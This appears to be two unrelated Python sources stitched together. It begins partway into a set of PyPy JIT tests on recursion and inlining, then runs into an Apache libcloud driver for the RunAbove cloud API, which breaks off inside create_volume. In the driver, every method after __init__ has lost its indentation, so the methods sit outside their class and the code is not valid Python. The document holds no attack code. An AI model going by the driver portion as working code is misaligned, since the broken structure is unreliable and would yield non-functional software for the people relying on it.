        myjitdriver = JitDriver(greens=[], reds=['n', 'recurse'])
        def loop(n, recurse=False):
            while n:
                myjitdriver.jit_merge_point(n=n, recurse=recurse)
                n -= 1
                if not recurse:
                    loop(10, True)
                    myjitdriver.can_enter_jit(n=n, recurse=recurse)
            return n
        TRACE_LIMIT = 66
        def main(inline):
            set_param(None, "threshold", 10)
            set_param(None, 'function_threshold', 60)
            if inline:
                set_param(None, 'inlining', True)
            else:
                set_param(None, 'inlining', False)
            return loop(100)
        # inlining off: the recursive call stays a residual call_may_force
        res = self.meta_interp(main, [0], enable_opts='', trace_limit=TRACE_LIMIT)
        self.check_resops(call=0, call_may_force_i=1)
        # inlining on: no residual calls at all
        res = self.meta_interp(main, [1], enable_opts='', trace_limit=TRACE_LIMIT)
        self.check_resops(call=0, call_may_force=0)
    def test_trace_from_start(self):
        """Tracing may start at a function's beginning, not only at can_enter_jit."""
        def p(pc, code):
            code = hlstr(code)
            return "'%s' at %d: %s" % (code, pc, code[pc])
        myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
                                get_printable_location=p)
        def f(code, n):
            pc = 0
            while pc < len(code):
                myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
                op = code[pc]
                if op == "+":
                    n += 7
                elif op == "-":
                    n -= 1
                elif op == "c":
                    n = f('---', n)
                elif op == "l":
                    if n > 0:
                        myjitdriver.can_enter_jit(n=n, code=code, pc=1)
                        pc = 1
                        continue
                else:
                    assert 0
                pc += 1
            return n
        def g(m):
            if m > 1000000:
                f('', 0)
            result = 0
            for i in range(m):
                result += f('+-cl--', i)
        res = self.meta_interp(g, [50], backendopt=True)
        assert res == g(50)
        py.test.skip("tracing from start is by now only longer enabled "
                     "if a trace gets too big")
        self.check_tree_loop_count(3)
        self.check_history(int_add=1)
    def test_dont_inline_huge_stuff(self):
        """A callee whose own trace exceeds trace_limit must not be inlined."""
        def p(pc, code):
            code = hlstr(code)
            return "%s %d %s" % (code, pc, code[pc])
        myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
                                get_printable_location=p)
        def f(code, n):
            pc = 0
            while pc < len(code):
                myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
                op = code[pc]
                if op == "-":
                    n -= 1
                elif op == "c":
                    f('--------------------', n)
                elif op == "l":
                    if n > 0:
                        myjitdriver.can_enter_jit(n=n, code=code, pc=0)
                        pc = 0
                        continue
                else:
                    assert 0
                pc += 1
            return n
        def g(m):
            set_param(None, 'inlining', True)
            # carefully chosen threshold to make sure that the inner function
            # cannot be inlined, but the inner function on its own is small
            # enough
            set_param(None, 'trace_limit', 40)
            if m > 1000000:
                f('', 0)
            result = 0
            for i in range(m):
                result += f('-c-----------l-', i+100)
        self.meta_interp(g, [10], backendopt=True)
        self.check_aborted_count(1)
        self.check_resops(call=0, call_assembler_i=2)
        self.check_jitcell_token_count(2)
    def test_directly_call_assembler(self):
        """A recursive portal call is compiled as a direct call_assembler."""
        driver = JitDriver(greens = ['codeno'], reds = ['i'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno):
            i = 0
            while i < 10:
                driver.can_enter_jit(codeno = codeno, i = i)
                driver.jit_merge_point(codeno = codeno, i = i)
                if codeno == 2:
                    portal(1)
                i += 1
        self.meta_interp(portal, [2], inline=True)
        self.check_history(call_assembler_n=1)
    def test_recursion_cant_call_assembler_directly(self):
        """Recursion first goes through a temporary callback, later redirected."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'j'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno, j):
            i = 1
            while 1:
                driver.jit_merge_point(codeno=codeno, i=i, j=j)
                if (i >> 1) == 1:
                    if j == 0:
                        return
                    portal(2, j - 1)
                elif i == 5:
                    return
                i += 1
                driver.can_enter_jit(codeno=codeno, i=i, j=j)
        portal(2, 5)
        from rpython.jit.metainterp import compile, pyjitpl
        pyjitpl._warmrunnerdesc = None
        trace = []
        # wrap compile_tmp_callback so we can record each looptoken it creates
        def my_ctc(*args):
            looptoken = original_ctc(*args)
            trace.append(looptoken)
            return looptoken
        original_ctc = compile.compile_tmp_callback
        try:
            compile.compile_tmp_callback = my_ctc
            self.meta_interp(portal, [2, 5], inline=True)
            self.check_resops(call_may_force=0, call_assembler_n=2)
        finally:
            compile.compile_tmp_callback = original_ctc
        # check that we made a temporary callback
        assert len(trace) == 1
        # and that we later redirected it to something else
        try:
            redirected = pyjitpl._warmrunnerdesc.cpu._redirected_call_assembler
        except AttributeError:
            pass    # not the llgraph backend
        else:
            print redirected
            assert redirected.keys() == trace
    def test_recursion_cant_call_assembler_directly_with_virtualizable(self):
        # exactly the same logic as the previous test, but with 'frame.j'
        # instead of just 'j'
        class Frame(object):
            _virtualizable_ = ['j']
            def __init__(self, j):
                self.j = j
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
                           virtualizables = ['frame'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno, frame):
            i = 1
            while 1:
                driver.jit_merge_point(codeno=codeno, i=i, frame=frame)
                if (i >> 1) == 1:
                    if frame.j == 0:
                        return
                    portal(2, Frame(frame.j - 1))
                elif i == 5:
                    return
                i += 1
                driver.can_enter_jit(codeno=codeno, i=i, frame=frame)
        def main(codeno, j):
            portal(codeno, Frame(j))
        main(2, 5)
        from rpython.jit.metainterp import compile, pyjitpl
        pyjitpl._warmrunnerdesc = None
        trace = []
        # wrap compile_tmp_callback so we can record each looptoken it creates
        def my_ctc(*args):
            looptoken = original_ctc(*args)
            trace.append(looptoken)
            return looptoken
        original_ctc = compile.compile_tmp_callback
        try:
            compile.compile_tmp_callback = my_ctc
            self.meta_interp(main, [2, 5], inline=True)
            self.check_resops(call_may_force=0, call_assembler_n=2)
        finally:
            compile.compile_tmp_callback = original_ctc
        # check that we made a temporary callback
        assert len(trace) == 1
        # and that we later redirected it to something else
        try:
            redirected = pyjitpl._warmrunnerdesc.cpu._redirected_call_assembler
        except AttributeError:
            pass    # not the llgraph backend
        else:
            print redirected
            assert redirected.keys() == trace
    def test_directly_call_assembler_return(self):
        """call_assembler whose result is actually used (returned value)."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno):
            i = 0
            k = codeno
            while i < 10:
                driver.can_enter_jit(codeno = codeno, i = i, k = k)
                driver.jit_merge_point(codeno = codeno, i = i, k = k)
                if codeno == 2:
                    k = portal(1)
                i += 1
            return k
        self.meta_interp(portal, [2], inline=True)
        self.check_history(call_assembler_i=1)
    def test_directly_call_assembler_raise(self):
        """Exceptions must propagate correctly out of a call_assembler."""
        class MyException(Exception):
            def __init__(self, x):
                self.x = x
        driver = JitDriver(greens = ['codeno'], reds = ['i'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno):
            i = 0
            while i < 10:
                driver.can_enter_jit(codeno = codeno, i = i)
                driver.jit_merge_point(codeno = codeno, i = i)
                if codeno == 2:
                    try:
                        portal(1)
                    except MyException, me:
                        i += me.x
                i += 1
                if codeno == 1:
                    raise MyException(1)
        self.meta_interp(portal, [2], inline=True)
        self.check_history(call_assembler_n=1)
    def test_directly_call_assembler_fail_guard(self):
        """Guard failures inside call_assembler'd code must keep results correct."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno, k):
            i = 0
            while i < 10:
                driver.can_enter_jit(codeno=codeno, i=i, k=k)
                driver.jit_merge_point(codeno=codeno, i=i, k=k)
                if codeno == 2:
                    k += portal(1, k)
                elif k > 40:
                    if i % 2:
                        k += 1
                    else:
                        k += 2
                k += 1
                i += 1
            return k
        res = self.meta_interp(portal, [2, 0], inline=True)
        assert res == 13542
    def test_directly_call_assembler_virtualizable(self):
        """call_assembler combined with a virtualizable frame."""
        class Thing(object):
            def __init__(self, val):
                self.val = val
        class Frame(object):
            _virtualizable_ = ['thing']
        driver = JitDriver(greens = ['codeno'], reds = ['i', 's', 'frame'],
                           virtualizables = ['frame'],
                           get_printable_location = lambda codeno : str(codeno))
        def main(codeno):
            frame = Frame()
            frame.thing = Thing(0)
            result = portal(codeno, frame)
            return result
        def portal(codeno, frame):
            i = 0
            s = 0
            while i < 10:
                driver.can_enter_jit(frame=frame, codeno=codeno, i=i, s=s)
                driver.jit_merge_point(frame=frame, codeno=codeno, i=i, s=s)
                nextval = frame.thing.val
                if codeno == 0:
                    subframe = Frame()
                    subframe.thing = Thing(nextval)
                    nextval = portal(1, subframe)
                    s += subframe.thing.val
                frame.thing = Thing(nextval + 1)
                i += 1
            return frame.thing.val + s
        res = self.meta_interp(main, [0], inline=True)
        self.check_resops(call=0, cond_call=2)
        assert res == main(0)
    def test_directly_call_assembler_virtualizable_reset_token(self):
        """Check the vable_token is reset after a call_assembler (skipped)."""
        py.test.skip("not applicable any more, I think")
        from rpython.rtyper.lltypesystem import lltype
        from rpython.rlib.debug import llinterpcall
        class Thing(object):
            def __init__(self, val):
                self.val = val
        class Frame(object):
            _virtualizable_ = ['thing']
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
                           virtualizables = ['frame'],
                           get_printable_location = lambda codeno : str(codeno))
        @dont_look_inside
        def check_frame(subframe):
            if we_are_translated():
                llinterpcall(lltype.Void, check_ll_frame, subframe)
        def check_ll_frame(ll_subframe):
            # This is called with the low-level Struct that is the frame.
            # Check that the vable_token was correctly reset to zero.
            # Note that in order for that test to catch failures, it needs
            # three levels of recursion: the vable_token of the subframe
            # at the level 2 is set to a non-zero value when doing the
            # call to the level 3 only.  This used to fail when the test
            # is run via rpython.jit.backend.x86.test.test_recursive.
            from rpython.jit.metainterp.virtualizable import TOKEN_NONE
            assert ll_subframe.vable_token == TOKEN_NONE
        def main(codeno):
            frame = Frame()
            frame.thing = Thing(0)
            portal(codeno, frame)
            return frame.thing.val
        def portal(codeno, frame):
            i = 0
            while i < 5:
                driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
                driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
                nextval = frame.thing.val
                if codeno < 2:
                    subframe = Frame()
                    subframe.thing = Thing(nextval)
                    nextval = portal(codeno + 1, subframe)
                    check_frame(subframe)
                frame.thing = Thing(nextval + 1)
                i += 1
            return frame.thing.val
        res = self.meta_interp(main, [0], inline=True)
        assert res == main(0)
    def test_directly_call_assembler_virtualizable_force1(self):
        """Forcing the virtualizable from outside while call_assembler runs."""
        class Thing(object):
            def __init__(self, val):
                self.val = val
        class Frame(object):
            _virtualizable_ = ['thing']
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
                           virtualizables = ['frame'],
                           get_printable_location = lambda codeno : str(codeno))
        class SomewhereElse(object):
            pass
        somewhere_else = SomewhereElse()
        def change(newthing):
            # mutates the frame from outside the traced code, forcing it
            somewhere_else.frame.thing = newthing
        def main(codeno):
            frame = Frame()
            somewhere_else.frame = frame
            frame.thing = Thing(0)
            portal(codeno, frame)
            return frame.thing.val
        def portal(codeno, frame):
            print 'ENTER:', codeno, frame.thing.val
            i = 0
            while i < 10:
                driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
                driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
                nextval = frame.thing.val
                if codeno == 0:
                    subframe = Frame()
                    subframe.thing = Thing(nextval)
                    nextval = portal(1, subframe)
                elif codeno == 1:
                    if frame.thing.val > 40:
                        change(Thing(13))
                        nextval = 13
                else:
                    fatalerror("bad codeno = " + str(codeno))
                frame.thing = Thing(nextval + 1)
                i += 1
            print 'LEAVE:', codeno, frame.thing.val
            return frame.thing.val
        res = self.meta_interp(main, [0], inline=True,
                               policy=StopAtXPolicy(change))
        assert res == main(0)
    def test_directly_call_assembler_virtualizable_with_array(self):
        """Virtualizable with an array field across recursive portal calls."""
        myjitdriver = JitDriver(greens = ['codeno'], reds = ['n', 'x', 'frame'],
                                virtualizables = ['frame'])
        class Frame(object):
            _virtualizable_ = ['l[*]', 's']
            def __init__(self, l, s):
                self = hint(self, access_directly=True,
                            fresh_virtualizable=True)
                self.l = l
                self.s = s
        def main(codeno, n, a):
            frame = Frame([a, a+1, a+2, a+3], 0)
            return f(codeno, n, a, frame)
        def f(codeno, n, a, frame):
            x = 0
            while n > 0:
                myjitdriver.can_enter_jit(codeno=codeno, frame=frame, n=n, x=x)
                myjitdriver.jit_merge_point(codeno=codeno, frame=frame, n=n,
                                            x=x)
                frame.s = promote(frame.s)
                n -= 1
                s = frame.s
                assert s >= 0
                x += frame.l[s]
                frame.s += 1
                if codeno == 0:
                    subframe = Frame([n, n+1, n+2, n+3], 0)
                    x += f(1, 10, 1, subframe)
                s = frame.s
                assert s >= 0
                x += frame.l[s]
                x += len(frame.l)
                frame.s -= 1
            return x
        res = self.meta_interp(main, [0, 10, 1], listops=True, inline=True)
        assert res == main(0, 10, 1)
    def test_directly_call_assembler_virtualizable_force_blackhole(self):
        """Forcing the virtualizable while falling back to the blackhole interp."""
        class Thing(object):
            def __init__(self, val):
                self.val = val
        class Frame(object):
            _virtualizable_ = ['thing']
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'frame'],
                           virtualizables = ['frame'],
                           get_printable_location = lambda codeno : str(codeno))
        class SomewhereElse(object):
            pass
        somewhere_else = SomewhereElse()
        def change(newthing, arg):
            print arg
            if arg > 30:
                # mutate the frame from outside, forcing the virtualizable
                somewhere_else.frame.thing = newthing
                arg = 13
            return arg
        def main(codeno):
            frame = Frame()
            somewhere_else.frame = frame
            frame.thing = Thing(0)
            portal(codeno, frame)
            return frame.thing.val
        def portal(codeno, frame):
            i = 0
            while i < 10:
                driver.can_enter_jit(frame=frame, codeno=codeno, i=i)
                driver.jit_merge_point(frame=frame, codeno=codeno, i=i)
                nextval = frame.thing.val
                if codeno == 0:
                    subframe = Frame()
                    subframe.thing = Thing(nextval)
                    nextval = portal(1, subframe)
                else:
                    nextval = change(Thing(13), frame.thing.val)
                frame.thing = Thing(nextval + 1)
                i += 1
            return frame.thing.val
        res = self.meta_interp(main, [0], inline=True,
                               policy=StopAtXPolicy(change))
        assert res == main(0)
    def test_assembler_call_red_args(self):
        """call_assembler must pass red (non-constant) arguments correctly."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
                           get_printable_location = lambda codeno : str(codeno))
        def residual(k):
            if k > 150:
                return 0
            return 1
        def portal(codeno, k):
            i = 0
            while i < 15:
                driver.can_enter_jit(codeno=codeno, i=i, k=k)
                driver.jit_merge_point(codeno=codeno, i=i, k=k)
                if codeno == 2:
                    k += portal(residual(k), k)
                if codeno == 0:
                    k += 2
                elif codeno == 1:
                    k += 1
                i += 1
            return k
        res = self.meta_interp(portal, [2, 0], inline=True,
                               policy=StopAtXPolicy(residual))
        assert res == portal(2, 0)
        self.check_resops(call_assembler_i=4)
    def test_inline_without_hitting_the_loop(self):
        """Inlining must work even when the inner call never hits can_enter_jit."""
        driver = JitDriver(greens = ['codeno'], reds = ['i'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno):
            i = 0
            while True:
                driver.jit_merge_point(codeno=codeno, i=i)
                if codeno < 10:
                    i += portal(20)
                    codeno += 1
                elif codeno == 10:
                    if i > 63:
                        return i
                    codeno = 0
                    driver.can_enter_jit(codeno=codeno, i=i)
                else:
                    return 1
        assert portal(0) == 70
        res = self.meta_interp(portal, [0], inline=True)
        assert res == 70
        self.check_resops(call_assembler=0)
    def test_inline_with_hitting_the_loop_sometimes(self):
        """Inlining when the inner call only sometimes reaches can_enter_jit."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
                           get_printable_location = lambda codeno : str(codeno))
        def portal(codeno, k):
            if k > 2:
                return 1
            i = 0
            while True:
                driver.jit_merge_point(codeno=codeno, i=i, k=k)
                if codeno < 10:
                    i += portal(codeno + 5, k+1)
                    codeno += 1
                elif codeno == 10:
                    if i > [-1, 2000, 63][k]:
                        return i
                    codeno = 0
                    driver.can_enter_jit(codeno=codeno, i=i, k=k)
                else:
                    return 1
        assert portal(0, 1) == 2095
        res = self.meta_interp(portal, [0, 1], inline=True)
        assert res == 2095
        self.check_resops(call_assembler_i=12)
    def test_inline_with_hitting_the_loop_sometimes_exc(self):
        """Same as the previous test, but results are returned via an exception."""
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'k'],
                           get_printable_location = lambda codeno : str(codeno))
        class GotValue(Exception):
            def __init__(self, result):
                self.result = result
        def portal(codeno, k):
            if k > 2:
                raise GotValue(1)
            i = 0
            while True:
                driver.jit_merge_point(codeno=codeno, i=i, k=k)
                if codeno < 10:
                    try:
                        portal(codeno + 5, k+1)
                    except GotValue, e:
                        i += e.result
                    codeno += 1
                elif codeno == 10:
                    if i > [-1, 2000, 63][k]:
                        raise GotValue(i)
                    codeno = 0
                    driver.can_enter_jit(codeno=codeno, i=i, k=k)
                else:
                    raise GotValue(1)
        def main(codeno, k):
            try:
                portal(codeno, k)
            except GotValue, e:
                return e.result
        assert main(0, 1) == 2095
        res = self.meta_interp(main, [0, 1], inline=True)
        assert res == 2095
        self.check_resops(call_assembler_n=12)
    def test_inline_recursion_limit(self):
        """max_unroll_recursion bounds how deeply recursion is inlined."""
        driver = JitDriver(greens = ["threshold", "loop"], reds=["i"])
        @dont_look_inside
        def f():
            set_param(driver, "max_unroll_recursion", 10)
        def portal(threshold, loop, i):
            f()
            if i > threshold:
                return i
            while True:
                driver.jit_merge_point(threshold=threshold, loop=loop, i=i)
                if loop:
                    portal(threshold, False, 0)
                else:
                    portal(threshold, False, i + 1)
                    return i
                if i > 10:
                    return 1
                i += 1
                driver.can_enter_jit(threshold=threshold, loop=loop, i=i)
        res1 = portal(10, True, 0)
        res2 = self.meta_interp(portal, [10, True, 0], inline=True)
        assert res1 == res2
        self.check_resops(call_assembler_i=2)
        res1 = portal(9, True, 0)
        res2 = self.meta_interp(portal, [9, True, 0], inline=True)
        assert res1 == res2
        self.check_resops(call_assembler=0)
    def test_handle_jitexception_in_portal(self):
        # a test for _handle_jitexception_in_portal in blackhole.py
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'str'],
                           get_printable_location = lambda codeno: str(codeno))
        def do_can_enter_jit(codeno, i, str):
            i = (i+1)-1    # some operations
            driver.can_enter_jit(codeno=codeno, i=i, str=str)
        def intermediate(codeno, i, str):
            if i == 9:
                do_can_enter_jit(codeno, i, str)
        def portal(codeno, str):
            i = value.initial
            while i < 10:
                intermediate(codeno, i, str)
                driver.jit_merge_point(codeno=codeno, i=i, str=str)
                i += 1
                if codeno == 64 and i == 10:
                    str = portal(96, str)
                str += chr(codeno+i)
            return str
        class Value:
            initial = -1
        value = Value()
        def main():
            value.initial = 0
            return (portal(64, '') +
                    portal(64, '') +
                    portal(64, '') +
                    portal(64, '') +
                    portal(64, ''))
        assert main() == 'ABCDEFGHIabcdefghijJ' * 5
        # run with several trace limits to exercise different abort points
        for tlimit in [95, 90, 102]:
            print 'tlimit =', tlimit
            res = self.meta_interp(main, [], inline=True, trace_limit=tlimit)
            assert ''.join(res.chars) == 'ABCDEFGHIabcdefghijJ' * 5
    def test_handle_jitexception_in_portal_returns_void(self):
        # a test for _handle_jitexception_in_portal in blackhole.py
        driver = JitDriver(greens = ['codeno'], reds = ['i', 'str'],
                           get_printable_location = lambda codeno: str(codeno))
        def do_can_enter_jit(codeno, i, str):
            i = (i+1)-1    # some operations
            driver.can_enter_jit(codeno=codeno, i=i, str=str)
        def intermediate(codeno, i, str):
            if i == 9:
                do_can_enter_jit(codeno, i, str)
        def portal(codeno, str):
            i = value.initial
            while i < 10:
                intermediate(codeno, i, str)
                driver.jit_merge_point(codeno=codeno, i=i, str=str)
                i += 1
                if codeno == 64 and i == 10:
                    portal(96, str)
                str += chr(codeno+i)
        class Value:
            initial = -1
        value = Value()
        def main():
            value.initial = 0
            portal(64, '')
            portal(64, '')
            portal(64, '')
            portal(64, '')
            portal(64, '')
        main()
        # run with several trace limits to exercise different abort points
        for tlimit in [95, 90, 102]:
            print 'tlimit =', tlimit
            self.meta_interp(main, [], inline=True, trace_limit=tlimit)
    def test_no_duplicates_bug(self):
        """Regression test (see name): recursive portal with an early break."""
        driver = JitDriver(greens = ['codeno'], reds = ['i'],
                           get_printable_location = lambda codeno: str(codeno))
        def portal(codeno, i):
            while i > 0:
                driver.can_enter_jit(codeno=codeno, i=i)
                driver.jit_merge_point(codeno=codeno, i=i)
                if codeno > 0:
                    break
                portal(i, i)
                i -= 1
        self.meta_interp(portal, [0, 10], inline=True)
    def test_trace_from_start_always(self):
        """function_threshold=0 changes how/whether tracing starts from the top."""
        from rpython.rlib.nonconst import NonConstant
        driver = JitDriver(greens = ['c'], reds = ['i', 'v'])
        def portal(c, i, v):
            while i > 0:
                driver.jit_merge_point(c=c, i=i, v=v)
                portal(c, i - 1, v)
                if v:
                    driver.can_enter_jit(c=c, i=i, v=v)
                break
        def main(c, i, _set_param, v):
            if _set_param:
                set_param(driver, 'function_threshold', 0)
            portal(c, i, v)
        self.meta_interp(main, [10, 10, False, False], inline=True)
        self.check_jitcell_token_count(1)
        self.check_trace_count(1)
        self.meta_interp(main, [3, 10, True, False], inline=True)
        self.check_jitcell_token_count(0)
        self.check_trace_count(0)
    def test_trace_from_start_does_not_prevent_inlining(self):
        """Tracing from the function start must not disable later inlining."""
        driver = JitDriver(greens = ['c', 'bc'], reds = ['i'])
        def portal(bc, c, i):
            while True:
                driver.jit_merge_point(c=c, bc=bc, i=i)
                if bc == 0:
                    portal(1, 8, 0)
                    c += 1
                else:
                    return
                if c == 10: # bc == 0
                    c = 0
                    if i >= 100:
                        return
                    driver.can_enter_jit(c=c, bc=bc, i=i)
                    i += 1
        self.meta_interp(portal, [0, 0, 0], inline=True)
        self.check_resops(call_may_force=0, call=0)
    def test_dont_repeatedly_trace_from_the_same_guard(self):
        """A guard failing at every recursion level must not retrace each time."""
        driver = JitDriver(greens = [], reds = ['level', 'i'])
        def portal(level):
            if level == 0:
                i = -10
            else:
                i = 0
            #
            while True:
                driver.jit_merge_point(level=level, i=i)
                if level == 25:
                    return 42
                i += 1
                if i <= 0:      # <- guard
                    continue    # first make a loop
                else:
                    # then we fail the guard above, doing a recursive call,
                    # which will itself fail the same guard above, and so on
                    return portal(level + 1)
        self.meta_interp(portal, [0])
        self.check_trace_count_at_most(2)   # and not, e.g., 24
    def test_get_unique_id(self):
        """Values from the get_unique_id hook must be registered in the codemap."""
        lst = []
        # wrap register_codemap to record every (start, size) it receives
        def reg_codemap(self, (start, size, l)):
            lst.append((start, size))
            old_reg_codemap(self, (start, size, l))
        old_reg_codemap = codemap.CodemapStorage.register_codemap
        try:
            codemap.CodemapStorage.register_codemap = reg_codemap
            def get_unique_id(pc, code):
                return (code + 1) * 2
            driver = JitDriver(greens=["pc", "code"], reds='auto',
                               get_unique_id=get_unique_id)
            def f(pc, code):
                i = 0
                while i < 10:
                    driver.jit_merge_point(pc=pc, code=code)
                    pc += 1
                    if pc == 3:
                        if code == 1:
                            f(0, 0)
                        pc = 0
                    i += 1
            self.meta_interp(f, [0, 1], inline=True)
            self.check_get_unique_id(lst) # overloaded on assembler backends
        finally:
            codemap.CodemapStorage.register_codemap = old_reg_codemap
    def check_get_unique_id(self, lst):
        # Default no-op; overridden on assembler backends to verify 'lst'.
        pass
class TestLLtype(RecursiveTests, LLJitMixin):
    """Run the recursion tests on the lltype backend."""
    pass
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
RunAbove driver
"""
from libcloud.common.runabove import API_ROOT, RunAboveConnection
from libcloud.compute.base import NodeDriver, NodeSize, Node, NodeLocation
from libcloud.compute.base import NodeImage, StorageVolume
from libcloud.compute.types import Provider, StorageVolumeState
from libcloud.compute.drivers.openstack import OpenStackNodeDriver
from libcloud.compute.drivers.openstack import OpenStackKeyPair
class RunAboveNodeDriver(NodeDriver):
    """
    Libcloud driver for the RunAbove API
    For more information on the RunAbove API, read the official reference:
        https://api.runabove.com/console/
    """
    type = Provider.RUNABOVE
    name = "RunAbove"
    website = 'https://www.runabove.com/'
    connectionCls = RunAboveConnection
    features = {'create_node': ['ssh_key']}
    api_name = 'runabove'
    # Node/volume states are the same as OpenStack's, so reuse those mappings.
    NODE_STATE_MAP = OpenStackNodeDriver.NODE_STATE_MAP
    VOLUME_STATE_MAP = OpenStackNodeDriver.VOLUME_STATE_MAP
    def __init__(self, key, secret, ex_consumer_key=None):
        """
        Instantiate the driver with the given API credentials.
        :param key: Your application key (required)
        :type key: ``str``
        :param secret: Your application secret (required)
        :type secret: ``str``
        :param ex_consumer_key: Your consumer key (required)
        :type ex_consumer_key: ``str``
        :rtype: ``None``
        """
        self.datacenter = None
        # NOTE: consumer_key must be set *before* calling the parent
        # constructor -- NodeDriver.__init__ builds the connection, which
        # presumably reads it (TODO confirm against RunAboveConnection).
        self.consumer_key = ex_consumer_key
        NodeDriver.__init__(self, key, secret, ex_consumer_key=ex_consumer_key)
def list_nodes(self, location=None):
"""
List all nodes.
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:return: List of node objects
:rtype: ``list`` of :class:`Node`
"""
action = API_ROOT + '/instance'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_nodes(response.object)
def ex_get_node(self, node_id):
"""
Get a individual node.
:keyword node_id: Node's ID
:type node_id: ``str``
:return: Created node
:rtype : :class:`Node`
"""
action = API_ROOT + '/instance/' + node_id
response = self.connection.request(action, method='GET')
return self._to_node(response.object)
def create_node(self, name, image, size, location, ex_keyname=None):
"""
Create a new node
:keyword name: Name of created node
:type name: ``str``
:keyword image: Image used for node
:type image: :class:`NodeImage`
:keyword size: Size (flavor) used for node
:type size: :class:`NodeSize`
:keyword location: Location (region) where to create node
:type location: :class:`NodeLocation`
:keyword ex_keyname: Name of SSH key used
:type ex_keyname: ``str``
:return: Created node
:rtype : :class:`Node`
"""
action = API_ROOT + '/instance'
data = {
'name': name,
'imageId': image.id,
'flavorId': size.id,
'region': location.id,
}
if ex_keyname:
data['sshKeyName'] = ex_keyname
response = self.connection.request(action, data=data, method='POST')
return self._to_node(response.object)
def destroy_node(self, node):
action = API_ROOT + '/instance/' + node.id
self.connection.request(action, method='DELETE')
return True
def list_sizes(self, location=None):
action = API_ROOT + '/flavor'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_sizes(response.object)
def ex_get_size(self, size_id):
"""
Get an individual size (flavor).
:keyword size_id: Size's ID
:type size_id: ``str``
:return: Size
:rtype: :class:`NodeSize`
"""
action = API_ROOT + '/flavor/' + size_id
response = self.connection.request(action)
return self._to_size(response.object)
def list_images(self, location=None, ex_size=None):
"""
List available images
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:keyword ex_size: Exclude images which are uncompatible with given size
:type ex_size: :class:`NodeImage`
:return: List of images
:rtype : ``list`` of :class:`NodeImage`
"""
action = API_ROOT + '/image'
data = {}
if location:
data['region'] = location.id
if ex_size:
data['flavorId'] = ex_size.id
response = self.connection.request(action, data=data)
return self._to_images(response.object)
def get_image(self, image_id):
action = API_ROOT + '/image/' + image_id
response = self.connection.request(action)
return self._to_image(response.object)
def list_locations(self):
action = API_ROOT + '/region'
data = self.connection.request(action)
return self._to_locations(data.object)
def list_key_pairs(self, location=None):
"""
List available SSH public keys.
:keyword location: Location (region) used as filter
:type location: :class:`NodeLocation`
:return: Public keys
:rtype: ``list``of :class:`KeyPair`
"""
action = API_ROOT + '/ssh'
data = {}
if location:
data['region'] = location.id
response = self.connection.request(action, data=data)
return self._to_key_pairs(response.object)
def get_key_pair(self, name, location):
"""
Get an individual SSH public key by its name and location.
:keyword name: SSH key name
:type name: str
:keyword location: Key's region
:type location: :class:`NodeLocation`
:return: Public key
:rtype: :class:`KeyPair`
"""
action = API_ROOT + '/ssh/' + name
data = {'region': location.id}
response = self.connection.request(action, data=data)
return self._to_key_pair(response.object)
def import_key_pair_from_string(self, name, key_material, location):
"""
Import a new public key from string.
:param name: Key pair name.
:type name: ``str``
:param key_material: Public key material.
:type key_material: ``str``
:return: Imported key pair object.
:rtype: :class:`KeyPair`
"""
action = API_ROOT + '/ssh'
data = {'name': name, 'publicKey': key_material, 'region': location.id}
response = self.connection.request(action, data=data, method='POST')
return self._to_key_pair(response.object)
def delete_key_pair(self, name, location):
"""
Delete an existing key pair.
:param name: Key pair name.
:type name: ``str``
:keyword location: Key's region
:type location: :class:`NodeLocation`
:return: True of False based on success of Keypair deletion
:rtype: ``bool``
"""
action = API_ROOT + '/ssh/' + name
data = {'name': name, 'region': location.id}
self.connection.request(action, data=data, method='DELETE')
return True
def create_volume(self, size, location, name=None,
ex_volume_type='classic', ex_description=None):
"""
Create a volume.
:param size: Size of volume to create (in GB).
:type size: ``int``
:param name: Name of volume to create
:type name: ``str``
:keyword location: Location to create the volume in
:type location: :class:`NodeLocation` or ``None``
:keyword ex_volume_type: ``'classic'`` or ``'high-speed'``
:type ex_volume_type: ``str``
:keyword ex_description: Optionnal description of volume
:type ex_description: str
:return: Storage Volume object
:rtype: :class:`StorageVolume`
"""
action = API_ROOT + '/volume'
data = {
'region': location.id,
'size': str(size),
'type': ex_volume_type,
}
if name:
data['name'] = name
if ex_description:
data['description'] = ex_description
response = self.connection.request(action, data=data, method='POST')
